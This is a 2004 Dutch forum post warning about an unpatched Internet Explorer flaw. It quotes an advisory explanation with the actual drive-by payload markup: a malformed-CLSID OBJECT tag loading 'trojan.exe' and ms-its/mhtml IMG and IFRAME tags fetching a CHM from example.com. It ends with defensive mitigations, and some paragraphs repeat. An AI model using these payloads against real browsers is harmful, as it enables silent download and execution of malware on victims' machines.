Zojuist las ik op Securityfocus.com een artikel wat een vervelende en potentieel gevaar opleverende bug in alle versies van Internet Explorer. Er is nog geen hotfix voor.
Deze fout staat het downloaden van executables op de achtergrond toe.
De gebruikte malafide CLSID parameter staat ook het uitvoeren van deze code toe. Als op een geinfecteerde computer een willekeurige website wordt geopend met IE, kan het zijn dat deze executables uitgevoerd worden zonder dat de gebruiker er iets van merkt.
http://www.securityfocus.com/archive/1/354447
Deze bug lijkt enigzins op een bug uit 2000. Echter werd deze per mail verspreid. Meer info over die bug, met dank aan elevator voor de link :
http://www.spconnect.com/pipermail/esd-l/2000q2/002193.html
Deze fout staat het downloaden van executables op de achtergrond toe.
De gebruikte malafide CLSID parameter staat ook het uitvoeren van deze code toe. Als op een geinfecteerde computer een willekeurige website wordt geopend met IE, kan het zijn dat deze executables uitgevoerd worden zonder dat de gebruiker er iets van merkt.
Er is nog geen patch uitgebracht. tot die tijd kan je het volgende doen :The exploit allows executable files to be downloaded and run in the background without
user intervention. It employs a malformed CLSID parameter, which enables it
to execute a file on the infected user's machine. When an infected user visits
a Web site, it can cause a possible malicious executable file to run on the system
without user permission.
The exploit works by tagging another script, which contains a CLASSID exploit as a
CHM. The following is an illustration of how this exploit works:
The file, LAUNCH.HTML, contains the following codes, which utilizes the exploit:
<OBJECT NAME='X' CLASSID='CLSID:11111111-1111-1111-1111-111111111123' CODEBASE='trojan.exe'>
To execute the script (LAUNCH.HTML) as a CHM, another script tags and calls LAUNCH.HTML
using the following:
[img]'ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm'><IMG SRC='ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm'><IMG SRC='ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm'><IFRAME SRC='redirgen.php?url=URL:ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm'[/img]
- Uitvoeren van .chm bestanden blokkeren : Configuratiescherm > Folder Options > File/Folder Options/File
Types/CHM ..) - De registersleutel 'HKEY_CLASSES_ROOT\PROTOCOLS\Handler\ms-its\' hernoemen.
- (Tijdelijk) overschakelen op een andere browser
- Wachten op een hotfix van Microsoft.
http://www.securityfocus.com/archive/1/354447
Deze bug lijkt enigzins op een bug uit 2000. Echter werd deze per mail verspreid. Meer info over die bug, met dank aan elevator voor de link :
http://www.spconnect.com/pipermail/esd-l/2000q2/002193.html
[ Voor 8% gewijzigd door sanfranjake op 20-02-2004 21:04 ]